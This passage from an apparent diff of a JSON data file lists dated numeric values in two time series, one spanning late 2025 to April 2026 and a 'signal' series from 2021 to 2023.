"2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2021-04-01", + 314.97247314453125 + ], + [ + "2021-04-05", + 321.2608337402344 + ], + [ + "2021-04-06", + 321.0376892089844 + ], + [ + "2021-04-07", + 321.8140563964844 + ], + [ + "2021-04-08", + 325.1717224121094 + ], + [ + "2021-04-09", + 327.1416931152344 + ], + [ + "2021-04-12", + 326.7147521972656 + ], + [ + "2021-04-13", + 330.5284729003906 + ], + [ + "2021-04-14", + 326.5594787597656 + ], + [ + "2021-04-15", + 331.5085754394531 + ], + [ + "2021-04-16", + 331.8968200683594 + ], + [ + "2021-04-19", + 328.8593444824219 + ], + [ + "2021-04-20", + 326.4623718261719 + ], + [ + "2021-04-21", + 329.25726318359375 + ], + [ + "2021-04-22", + 325.2882080078125 + ], + [ + "2021-04-23", + 329.3833923339844 + ], + [ + "2021-04-26", + 331.52801513671875 + ], + [ + "2021-04-27", + 330.0918273925781 + ], + [ + "2021-04-28", + 328.975830078125 + ], + [ + "2021-04-29", + 330.1597595214844 + ], + [ + "2021-04-30", + 327.9956359863281 + ], + [ + "2021-05-03", + 326.2489318847656 + ], + [ + "2021-05-04", + 320.37786865234375 + ], + [ + "2021-05-05", + 319.30059814453125 + ], + [ + "2021-05-06", + 321.707275390625 + ], + [ + "2021-05-07", + 324.3177490234375 + ], + [ + "2021-05-10", + 316.1272888183594 + ], + [ + "2021-05-11", + 315.69061279296875 + ], + [ + "2021-05-12", + 307.5196838378906 + ], + [ + "2021-05-13", + 309.8970947265625 + ], + [ + "2021-05-14", + 316.7386779785156 + ], + [ + "2021-05-17", + 314.8172607421875 + ], + [ + "2021-05-18", + 312.6920166015625 + ], + [ + "2021-05-19", + 313.05096435546875 + ], + [ + "2021-05-20", + 319.1064758300781 + ], + [ + "2021-05-21", + 317.3403015136719 + ], + [ + "2021-05-24", + 322.67779541015625 + ], + [ + "2021-05-25", + 323.1241149902344 + ], + [ + "2021-05-26", + 324.24981689453125 + ], + [ + "2021-05-27", + 323.03680419921875 + ], + [ + "2021-05-28", + 324.05572509765625 + ], + [ + "2021-06-01", + 322.978515625 + ], + [ + "2021-06-02", + 323.60931396484375 + ], + [ + "2021-06-03", + 320.2419738769531 + ], + [ + "2021-06-04", + 325.67633056640625 + ], + [ + "2021-06-07", + 326.64678955078125 + ], + [ + "2021-06-08", + 326.8020324707031 + ], + [ + "2021-06-09", + 326.879638671875 + ], + [ + "2021-06-10", + 330.2859191894531 + ], + [ + "2021-06-11", + 331.14959716796875 + ], + [ + "2021-06-14", + 334.3228454589844 + ], + [ + "2021-06-15", + 332.13946533203125 + ], + [ + "2021-06-16", + 330.9263916015625 + ], + [ + "2021-06-17", + 335.12835693359375 + ], + [ + "2021-06-18", + 332.49847412109375 + ], + [ + "2021-06-21", + 334.5649719238281 + ], + [ + "2021-06-22", + 337.68365478515625 + ], + [ + "2021-06-23", + 337.84881591796875 + ], + [ + "2021-06-24", + 339.9376525878906 + ], + [ + "2021-06-25", + 339.5198669433594 + ], + [ + "2021-06-28", + 343.64898681640625 + ], + [ + "2021-06-29", + 344.89263916015625 + ], + [ + "2021-06-30", + 344.3485107421875 + ], + [ + "2021-07-01", + 344.4845275878906 + ], + [ + "2021-07-02", + 348.4388427734375 + ], + [ + "2021-07-06", + 349.94464111328125 + ], + [ + "2021-07-07", + 350.68310546875 + ], + [ + "2021-07-08", + 348.5650939941406 + ], + [ + "2021-07-09", + 350.74139404296875 + ], + [ + "2021-07-12", + 352.11126708984375 + ], + [ + "2021-07-13", + 352.11126708984375 + ], + [ + "2021-07-14", + 352.7427978515625 + ], + [ + "2021-07-15", + 350.2652893066406 + ], + [ + "2021-07-16", + 347.4283752441406 + ], + [ + "2021-07-19", + 344.58172607421875 + ], + [ + "2021-07-20", + 348.58453369140625 + ], + [ + "2021-07-21", + 351.2757568359375 + ], + [ + "2021-07-22", + 353.59771728515625 + ], + [ + "2021-07-23", + 357.72686767578125 + ], + [ + "2021-07-26", + 358.00860595703125 + ], + [ + "2021-07-27", + 354.06402587890625 + ], + [ + "2021-07-28", + 355.4242248535156 + ], + [ + "2021-07-29", + 356.0557861328125 + ], + [ + "2021-07-30", + 354.2001037597656 + ], + [ + "2021-08-02", + 354.2293395996094 + ], + [ + "2021-08-03", + 356.3763732910156 + ], + [ + "2021-08-04", + 356.8913269042969 + ], + [ + "2021-08-05", + 359.1550598144531 + ], + [ + "2021-08-06", + 357.5810241699219 + ], + [ + "2021-08-09", + 358.2417907714844 + ], + [ + "2021-08-10", + 356.40557861328125 + ], + [ + "2021-08-11", + 355.7934875488281 + ], + [ + "2021-08-12", + 357.075927734375 + ], + [ + "2021-08-13", + 358.3291931152344 + ], + [ + "2021-08-16", + 358.4847106933594 + ], + [ + "2021-08-17", + 355.3271789550781 + ], + [ + "2021-08-18", + 351.9073181152344 + ], + [ + "2021-08-19", + 353.60748291015625 + ], + [ + "2021-08-20", + 357.27020263671875 + ], + [ + "2021-08-23", + 362.61383056640625 + ], + [ + "2021-08-24", + 363.7213439941406 + ], + [ + "2021-08-25", + 364.1391906738281 + ], + [ + "2021-08-26", + 361.8268737792969 + ], + [ + "2021-08-27", + 365.3438415527344 + ], + [ + "2021-08-30", + 369.44378662109375 + ], + [ + "2021-08-31", + 369.14263916015625 + ], + [ + "2021-09-01", + 369.7547607421875 + ], + [ + "2021-09-02", + 369.5798034667969 + ], + [ + "2021-09-03", + 370.7166442871094 + ], + [ + "2021-09-07", + 371.2411804199219 + ], + [ + "2021-09-08", + 369.948974609375 + ], + [ + "2021-09-09", + 368.6763000488281 + ], + [ + "2021-09-10", + 365.8782043457031 + ], + [ + "2021-09-13", + 365.62554931640625 + ], + [ + "2021-09-14", + 364.5860900878906 + ], + [ + "2021-09-15", + 367.2967224121094 + ], + [ + "2021-09-16", + 367.5492248535156 + ], + [ + "2021-09-17", + 363.19671630859375 + ], + [ + "2021-09-20", + 355.6918640136719 + ], + [ + "2021-09-21", + 356.12957763671875 + ], + [ + "2021-09-22", + 359.45599365234375 + ], + [ + "2021-09-23", + 362.7726135253906 + ], + [ + "2021-09-24", + 363.1130676269531 + ], + [ + "2021-09-27", + 360.2146301269531 + ], + [ + "2021-09-28", + 350.02142333984375 + ], + [ + "2021-09-29", + 349.44757080078125 + ], + [ + "2021-09-30", + 348.1637268066406 + ], + [ + "2021-10-01", + 350.3229675292969 + ], + [ + "2021-10-04", + 342.9698181152344 + ], + [ + "2021-10-05", + 347.59967041015625 + ], + [ + "2021-10-06", + 349.826904296875 + ], + [ + "2021-10-07", + 353.03662109375 + ], + [ + "2021-10-08", + 351.2761535644531 + ], + [ + "2021-10-11", + 348.58197021484375 + ], + [ + "2021-10-12", + 347.3662414550781 + ], + [ + "2021-10-13", + 350.1478271484375 + ], + [ + "2021-10-14", + 356.596435546875 + ], + [ + "2021-10-15", + 358.84320068359375 + ], + [ + "2021-10-18", + 362.4516296386719 + ], + [ + "2021-10-19", + 365.1944580078125 + ], + [ + "2021-10-20", + 364.7179260253906 + ], + [ + "2021-10-21", + 366.9452209472656 + ], + [ + "2021-10-22", + 363.8619079589844 + ], + [ + "2021-10-25", + 367.5871887207031 + ], + [ + "2021-10-26", + 368.74456787109375 + ], + [ + "2021-10-27", + 369.6004943847656 + ], + [ + "2021-10-28", + 373.70501708984375 + ], + [ + "2021-10-29", + 375.54327392578125 + ], + [ + "2021-11-01", + 376.8271484375 + ], + [ + "2021-11-02", + 378.40283203125 + ], + [ + "2021-11-03", + 382.41986083984375 + ], + [ + "2021-11-04", + 387.3219299316406 + ], + [ + "2021-11-05", + 387.69146728515625 + ], + [ + "2021-11-08", + 387.16619873046875 + ], + [ + "2021-11-09", + 384.5012512207031 + ], + [ + "2021-11-10", + 378.85028076171875 + ], + [ + "2021-11-11", + 379.9007568359375 + ], + [ + "2021-11-12", + 383.8982849121094 + ], + [ + "2021-11-15", + 383.81072998046875 + ], + [ + "2021-11-16", + 386.5438537597656 + ], + [ + "2021-11-17", + 386.7480163574219 + ], + [ + "2021-11-18", + 390.7553405761719 + ], + [ + "2021-11-19", + 392.9339599609375 + ], + [ + "2021-11-22", + 388.37237548828125 + ], + [ + "2021-11-23", + 386.60211181640625 + ], + [ + "2021-11-24", + 387.8471984863281 + ], + [ + "2021-11-26", + 380.4940490722656 + ], + [ + "2021-11-29", + 388.7516784667969 + ], + [ + "2021-11-30", + 383.04229736328125 + ], + [ + "2021-12-01", + 376.5256652832031 + ], + [ + "2021-12-02", + 379.23931884765625 + ], + [ + "2021-12-03", + 372.6449890136719 + ], + [ + "2021-12-06", + 375.6308288574219 + ], + [ + "2021-12-07", + 386.942626953125 + ], + [ + "2021-12-08", + 388.6737976074219 + ], + [ + "2021-12-09", + 382.9547424316406 + ], + [ + "2021-12-10", + 387.11761474609375 + ], + [ + "2021-12-13", + 381.5249938964844 + ], + [ + "2021-12-14", + 377.576171875 + ], + [ + "2021-12-15", + 386.1838684082031 + ], + [ + "2021-12-16", + 376.2532958984375 + ], + [ + "2021-12-17", + 374.3760986328125 + ], + [ + "2021-12-20", + 370.74462890625 + ], + [ + "2021-12-21", + 379.0419006347656 + ], + [ + "2021-12-22", + 383.658203125 + ], + [ + "2021-12-23", + 386.55059814453125 + ], + [ + "2021-12-27", + 392.9392395019531 + ], + [ + "2021-12-28", + 391.1180725097656 + ], + [ + "2021-12-29", + 391.05963134765625 + ], + [ + "2021-12-30", + 389.8910217285156 + ], + [ + "2021-12-31", + 387.456298828125 + ], + [ + "2022-01-03", + 391.1861572265625 + ], + [ + "2022-01-04", + 386.1123352050781 + ], + [ + "2022-01-05", + 374.2505187988281 + ], + [ + "2022-01-06", + 373.987548828125 + ], + [ + "2022-01-07", + 369.936279296875 + ], + [ + "2022-01-10", + 370.1797790527344 + ], + [ + "2022-01-11", + 375.74053955078125 + ], + [ + "2022-01-12", + 377.2305603027344 + ], + [ + "2022-01-13", + 367.793701171875 + ], + [ + "2022-01-14", + 370.0823974609375 + ], + [ + "2022-01-18", + 360.8694763183594 + ], + [ + "2022-01-19", + 356.9058532714844 + ], + [ + "2022-01-20", + 352.2701110839844 + ], + [ + "2022-01-21", + 342.502197265625 + ], + [ + "2022-01-24", + 344.07025146484375 + ], + [ + "2022-01-25", + 336.09405517578125 + ], + [ + "2022-01-26", + 335.5682678222656 + ], + [ + "2022-01-27", + 332.1888122558594 + ], + [ + "2022-01-28", + 342.60931396484375 + ], + [ + "2022-01-31", + 353.5654296875 + ], + [ + "2022-02-01", + 355.97088623046875 + ], + [ + "2022-02-02", + 358.8632507324219 + ], + [ + "2022-02-03", + 344.3136291503906 + ], + [ + "2022-02-04", + 348.6571044921875 + ], + [ + "2022-02-07", + 345.8523864746094 + ], + [ + "2022-02-08", + 349.73809814453125 + ], + [ + "2022-02-09", + 357.1492614746094 + ], + [ + "2022-02-10", + 349.0661315917969 + ], + [ + "2022-02-11", + 337.9931335449219 + ], + [ + "2022-02-14", + 338.4118957519531 + ], + [ + "2022-02-15", + 346.82623291015625 + ], + [ + "2022-02-16", + 346.738525390625 + ], + [ + "2022-02-17", + 336.42529296875 + ], + [ + "2022-02-18", + 332.588134765625 + ], + [ + "2022-02-22", + 329.24774169921875 + ], + [ + "2022-02-23", + 320.8139953613281 + ], + [ + "2022-02-24", + 331.5948181152344 + ], + [ + "2022-02-25", + 336.7368469238281 + ], + [ + "2022-02-28", + 337.73992919921875 + ], + [ + "2022-03-01", + 332.5686340332031 + ], + [ + "2022-03-02", + 338.1490173339844 + ], + [ + "2022-03-03", + 333.318603515625 + ], + [ + "2022-03-04", + 328.4881896972656 + ], + [ + "2022-03-07", + 316.373046875 + ], + [ + "2022-03-08", + 314.902587890625 + ], + [ + "2022-03-09", + 326.2384338378906 + ], + [ + "2022-03-10", + 322.6156005859375 + ], + [ + "2022-03-11", + 315.9250793457031 + ], + [ + "2022-03-14", + 309.85797119140625 + ], + [ + "2022-03-15", + 319.5771484375 + ], + [ + "2022-03-16", + 331.4293518066406 + ], + [ + "2022-03-17", + 335.44158935546875 + ], + [ + "2022-03-18", + 342.307373046875 + ], + [ + "2022-03-21", + 341.355712890625 + ], + [ + "2022-03-22", + 348.0643615722656 + ], + [ + "2022-03-23", + 343.06207275390625 + ], + [ + "2022-03-24", + 350.68719482421875 + ], + [ + "2022-03-25", + 350.3946838378906 + ], + [ + "2022-03-28", + 355.8161315917969 + ], + [ + "2022-03-29", + 361.9396667480469 + ], + [ + "2022-03-30", + 357.9418640136719 + ], + [ + "2022-03-31", + 353.50518798828125 + ], + [ + "2022-04-01", + 352.8324890136719 + ], + [ + "2022-04-04", + 360.0967712402344 + ], + [ + "2022-04-05", + 352.1011047363281 + ], + [ + "2022-04-06", + 344.4564514160156 + ], + [ + "2022-04-07", + 345.27557373046875 + ], + [ + "2022-04-08", + 340.44891357421875 + ], + [ + "2022-04-11", + 332.3948059082031 + ], + [ + "2022-04-12", + 330.9906311035156 + ], + [ + "2022-04-13", + 337.71868896484375 + ], + [ + "2022-04-14", + 329.99609375 + ], + [ + "2022-04-18", + 330.2496032714844 + ], + [ + "2022-04-19", + 337.6309509277344 + ], + [ + "2022-04-20", + 332.7068176269531 + ], + [ + "2022-04-21", + 325.8227844238281 + ], + [ + "2022-04-22", + 317.2908020019531 + ], + [ + "2022-04-25", + 321.3666687011719 + ], + [ + "2022-04-26", + 309.2366638183594 + ], + [ + "2022-04-27", + 308.86614990234375 + ], + [ + "2022-04-28", + 319.8357238769531 + ], + [ + "2022-04-29", + 305.4435729980469 + ], + [ + "2022-05-02", + 310.543212890625 + ], + [ + "2022-05-03", + 310.8747863769531 + ], + [ + "2022-05-04", + 321.3861083984375 + ], + [ + "2022-05-05", + 305.1997985839844 + ], + [ + "2022-05-06", + 301.54327392578125 + ], + [ + "2022-05-09", + 289.74481201171875 + ], + [ + "2022-05-10", + 293.2648010253906 + ], + [ + "2022-05-11", + 284.5671691894531 + ], + [ + "2022-05-12", + 283.8943176269531 + ], + [ + "2022-05-13", + 294.41546630859375 + ], + [ + "2022-05-16", + 291.00262451171875 + ], + [ + "2022-05-17", + 298.53997802734375 + ], + [ + "2022-05-18", + 283.88458251953125 + ], + [ + "2022-05-19", + 282.36346435546875 + ], + [ + "2022-05-20", + 281.48583984375 + ], + [ + "2022-05-23", + 286.166259765625 + ], + [ + "2022-05-24", + 280.0817565917969 + ], + [ + "2022-05-25", + 284.0016174316406 + ], + [ + "2022-05-26", + 291.8704833984375 + ], + [ + "2022-05-27", + 301.39697265625 + ], + [ + "2022-05-31", + 300.597412109375 + ], + [ + "2022-06-01", + 298.374267578125 + ], + [ + "2022-06-02", + 306.54541015625 + ], + [ + "2022-06-03", + 298.5693054199219 + ], + [ + "2022-06-06", + 299.5638122558594 + ], + [ + "2022-06-07", + 302.1478576660156 + ], + [ + "2022-06-08", + 299.9733581542969 + ], + [ + "2022-06-09", + 291.9387512207031 + ], + [ + "2022-06-10", + 281.6418762207031 + ], + [ + "2022-06-13", + 268.54656982421875 + ], + [ + "2022-06-14", + 269.0340881347656 + ], + [ + "2022-06-15", + 275.7524108886719 + ], + [ + "2022-06-16", + 264.6268005371094 + ], + [ + "2022-06-17", + 267.8445129394531 + ], + [ + "2022-06-21", + 274.60211181640625 + ], + [ + "2022-06-22", + 274.20166015625 + ], + [ + "2022-06-23", + 278.2851867675781 + ], + [ + "2022-06-24", + 287.8202819824219 + ], + [ + "2022-06-27", + 285.71002197265625 + ], + [ + "2022-06-28", + 277.00543212890625 + ], + [ + "2022-06-29", + 277.25946044921875 + ], + [ + "2022-06-30", + 273.820556640625 + ], + [ + "2022-07-01", + 275.6278991699219 + ], + [ + "2022-07-05", + 280.3465576171875 + ], + [ + "2022-07-06", + 282.1441955566406 + ], + [ + "2022-07-07", + 288.1817932128906 + ], + [ + "2022-07-08", + 288.5432434082031 + ], + [ + "2022-07-11", + 282.378662109375 + ], + [ + "2022-07-12", + 279.6431579589844 + ], + [ + "2022-07-13", + 279.0667724609375 + ], + [ + "2022-07-14", + 280.06329345703125 + ], + [ + "2022-07-15", + 285.1434326171875 + ], + [ + "2022-07-18", + 282.7303771972656 + ], + [ + "2022-07-19", + 291.4253234863281 + ], + [ + "2022-07-20", + 296.0462341308594 + ], + [ + "2022-07-21", + 300.2960510253906 + ], + [ + "2022-07-22", + 295.0302429199219 + ], + [ + "2022-07-25", + 293.3498229980469 + ], + [ + "2022-07-26", + 287.58575439453125 + ], + [ + "2022-07-27", + 299.7391357421875 + ], + [ + "2022-07-28", + 302.66998291015625 + ], + [ + "2022-07-29", + 308.1897888183594 + ], + [ + "2022-08-01", + 308.0041198730469 + ], + [ + "2022-08-02", + 307.08587646484375 + ], + [ + "2022-08-03", + 315.4485778808594 + ], + [ + "2022-08-04", + 316.9237365722656 + ], + [ + "2022-08-05", + 314.3348083496094 + ], + [ + "2022-08-08", + 313.3187561035156 + ], + [ + "2022-08-09", + 309.77239990234375 + ], + [ + "2022-08-10", + 318.4184875488281 + ], + [ + "2022-08-11", + 316.611083984375 + ], + [ + "2022-08-12", + 322.77569580078125 + ], + [ + "2022-08-15", + 325.3841857910156 + ], + [ + "2022-08-16", + 324.62213134765625 + ], + [ + "2022-08-17", + 320.9195251464844 + ], + [ + "2022-08-18", + 321.6913146972656 + ], + [ + "2022-08-19", + 315.4192199707031 + ], + [ + "2022-08-22", + 307.1151123046875 + ], + [ + "2022-08-23", + 306.86114501953125 + ], + [ + "2022-08-24", + 307.7501220703125 + ], + [ + "2022-08-25", + 313.19183349609375 + ], + [ + "2022-08-26", + 300.3546142578125 + ], + [ + "2022-08-29", + 297.3944396972656 + ], + [ + "2022-08-30", + 294.08251953125 + ], + [ + "2022-08-31", + 292.3728332519531 + ], + [ + "2022-09-01", + 292.4998779296875 + ], + [ + "2022-09-02", + 288.367431640625 + ], + [ + "2022-09-06", + 286.2962646484375 + ], + [ + "2022-09-07", + 292.079833984375 + ], + [ + "2022-09-08", + 293.5940856933594 + ], + [ + "2022-09-09", + 300.0126647949219 + ], + [ + "2022-09-12", + 303.57855224609375 + ], + [ + "2022-09-13", + 286.9313049316406 + ], + [ + "2022-09-14", + 289.2075500488281 + ], + [ + "2022-09-15", + 284.3912048339844 + ], + [ + "2022-09-16", + 282.65216064453125 + ], + [ + "2022-09-19", + 284.85333251953125 + ], + [ + "2022-09-20", + 282.5827331542969 + ], + [ + "2022-09-21", + 277.52276611328125 + ], + [ + "2022-09-22", + 274.10711669921875 + ], + [ + "2022-09-23", + 269.6441955566406 + ], + [ + "2022-09-26", + 268.5284423828125 + ], + [ + "2022-09-27", + 268.6361389160156 + ], + [ + "2022-09-28", + 273.97991943359375 + ], + [ + "2022-09-29", + 266.0817565917969 + ], + [ + "2022-09-30", + 261.56982421875 + ], + [ + "2022-10-03", + 267.7063903808594 + ], + [ + "2022-10-04", + 276.1231994628906 + ], + [ + "2022-10-05", + 275.9764404296875 + ], + [ + "2022-10-06", + 273.8036804199219 + ], + [ + "2022-10-07", + 263.3706359863281 + ], + [ + "2022-10-10", + 260.7379455566406 + ], + [ + "2022-10-11", + 257.1558532714844 + ], + [ + "2022-10-12", + 257.0677795410156 + ], + [ + "2022-10-13", + 263.09661865234375 + ], + [ + "2022-10-14", + 255.18862915039062 + ], + [ + "2022-10-17", + 263.6153259277344 + ], + [ + "2022-10-18", + 265.70001220703125 + ], + [ + "2022-10-19", + 264.73101806640625 + ], + [ + "2022-10-20", + 263.38043212890625 + ], + [ + "2022-10-21", + 269.5561828613281 + ], + [ + "2022-10-24", + 272.5215759277344 + ], + [ + "2022-10-25", + 278.1589660644531 + ], + [ + "2022-10-26", + 272.01263427734375 + ], + [ + "2022-10-27", + 267.0603942871094 + ], + [ + "2022-10-28", + 275.2326354980469 + ], + [ + "2022-10-31", + 272.0322265625 + ], + [ + "2022-11-01", + 269.2526550292969 + ], + [ + "2022-11-02", + 260.0234680175781 + ], + [ + "2022-11-03", + 254.94403076171875 + ], + [ + "2022-11-04", + 259.04473876953125 + ], + [ + "2022-11-07", + 261.892822265625 + ], + [ + "2022-11-08", + 263.8013000488281 + ], + [ + "2022-11-09", + 257.71368408203125 + ], + [ + "2022-11-10", + 276.72998046875 + ], + [ + "2022-11-11", + 281.8291320800781 + ], + [ + "2022-11-14", + 279.36279296875 + ], + [ + "2022-11-15", + 283.2287292480469 + ], + [ + "2022-11-16", + 279.36279296875 + ], + [ + "2022-11-17", + 278.7462158203125 + ], + [ + "2022-11-18", + 278.7559509277344 + ], + [ + "2022-11-21", + 275.88836669921875 + ], + [ + "2022-11-22", + 279.8619384765625 + ], + [ + "2022-11-23", + 282.67083740234375 + ], + [ + "2022-11-25", + 280.8113098144531 + ], + [ + "2022-11-28", + 276.6908874511719 + ], + [ + "2022-11-29", + 274.5965270996094 + ], + [ + "2022-11-30", + 287.1141052246094 + ], + [ + "2022-12-01", + 287.46649169921875 + ], + [ + "2022-12-02", + 286.3213806152344 + ], + [ + "2022-12-05", + 281.51593017578125 + ], + [ + "2022-12-06", + 275.682861328125 + ], + [ + "2022-12-07", + 274.5573425292969 + ], + [ + "2022-12-08", + 277.80657958984375 + ], + [ + "2022-12-09", + 276.0351257324219 + ], + [ + "2022-12-12", + 279.4998779296875 + ], + [ + "2022-12-13", + 282.50445556640625 + ], + [ + "2022-12-14", + 280.4100036621094 + ], + [ + "2022-12-15", + 270.9947814941406 + ], + [ + "2022-12-16", + 268.4110107421875 + ], + [ + "2022-12-19", + 264.6388854980469 + ], + [ + "2022-12-20", + 264.432861328125 + ], + [ + "2022-12-21", + 268.268798828125 + ], + [ + "2022-12-22", + 261.7055358886719 + ], + [ + "2022-12-23", + 262.2940979003906 + ], + [ + "2022-12-27", + 258.5857238769531 + ], + [ + "2022-12-28", + 255.17169189453125 + ], + [ + "2022-12-29", + 261.3916320800781 + ], + [ + "2022-12-30", + 261.234619140625 + ], + [ + "2023-01-03", + 259.46875 + ], + [ + "2023-01-04", + 260.7048034667969 + ], + [ + "2023-01-05", + 256.6236572265625 + ], + [ + "2023-01-06", + 263.7068786621094 + ], + [ + "2023-01-09", + 265.4139404296875 + ], + [ + "2023-01-10", + 267.66046142578125 + ], + [ + "2023-01-11", + 272.2910461425781 + ], + [ + "2023-01-12", + 273.76263427734375 + ], + [ + "2023-01-13", + 275.64630126953125 + ], + [ + "2023-01-17", + 276.2055358886719 + ], + [ + "2023-01-18", + 272.6148376464844 + ], + [ + "2023-01-19", + 269.9365539550781 + ], + [ + "2023-01-20", + 277.3238830566406 + ], + [ + "2023-01-23", + 283.48486328125 + ], + [ + "2023-01-24", + 282.9060363769531 + ], + [ + "2023-01-25", + 282.2781982421875 + ], + [ + "2023-01-26", + 287.7818603515625 + ], + [ + "2023-01-27", + 290.6466064453125 + ], + [ + "2023-01-30", + 284.77001953125 + ], + [ + "2023-01-31", + 289.03765869140625 + ], + [ + "2023-02-01", + 295.21826171875 + ], + [ + "2023-02-02", + 305.8135986328125 + ], + [ + "2023-02-03", + 300.37860107421875 + ], + [ + "2023-02-06", + 297.8376770019531 + ], + [ + "2023-02-07", + 304.0084533691406 + ], + [ + "2023-02-08", + 298.6028747558594 + ], + [ + "2023-02-09", + 295.9638671875 + ], + [ + "2023-02-10", + 294.0214538574219 + ], + [ + "2023-02-13", + 298.73040771484375 + ], + [ + "2023-02-14", + 300.93780517578125 + ], + [ + "2023-02-15", + 303.2432861328125 + ], + [ + "2023-02-16", + 297.55322265625 + ], + [ + "2023-02-17", + 295.4537048339844 + ], + [ + "2023-02-21", + 288.45880126953125 + ], + [ + "2023-02-22", + 288.67462158203125 + ], + [ + "2023-02-23", + 291.19598388671875 + ], + [ + "2023-02-24", + 286.32012939453125 + ], + [ + "2023-02-27", + 288.3704833984375 + ], + [ + "2023-02-28", + 287.99774169921875 + ], + [ + "2023-03-01", + 285.68243408203125 + ], + [ + "2023-03-02", + 288.0467529296875 + ], + [ + "2023-03-03", + 294.0018310546875 + ], + [ + "2023-03-06", + 294.3352966308594 + ], + [ + "2023-03-07", + 290.7251281738281 + ], + [ + "2023-03-08", + 292.17706298828125 + ], + [ + "2023-03-09", + 287.11474609375 + ], + [ + "2023-03-10", + 283.0826110839844 + ], + [ + "2023-03-13", + 285.18206787109375 + ], + [ + "2023-03-14", + 291.7355041503906 + ], + [ + "2023-03-15", + 293.26593017578125 + ], + [ + "2023-03-16", + 300.9966735839844 + ], + [ + "2023-03-17", + 299.5741271972656 + ], + [ + "2023-03-20", + 300.6372985839844 + ], + [ + "2023-03-21", + 304.93109130859375 + ], + [ + "2023-03-22", + 300.78472900390625 + ], + [ + "2023-03-23", + 304.3514404296875 + ], + [ + "2023-03-24", + 305.4715881347656 + ], + [ + "2023-03-27", + 303.3786926269531 + ], + [ + "2023-03-28", + 301.76727294921875 + ], + [ + "2023-03-29", + 307.2696838378906 + ], + [ + "2023-03-30", + 310.1780700683594 + ], + [ + "2023-03-31", + 315.33660888671875 + ], + [ + "2023-04-03", + 314.5701599121094 + ], + [ + "2023-04-04", + 313.50897216796875 + ], + [ + "2023-04-05", + 310.41387939453125 + ], + [ + "2023-04-06", + 312.5067138671875 + ], + [ + "2023-04-10", + 312.3298645019531 + ], + [ + "2023-04-11", + 310.325439453125 + ], + [ + "2023-04-12", + 307.5841064453125 + ], + [ + "2023-04-13", + 313.6072692871094 + ], + [ + "2023-04-14", + 313.0176696777344 + ], + [ + "2023-04-17", + 313.282958984375 + ], + [ + "2023-04-18", + 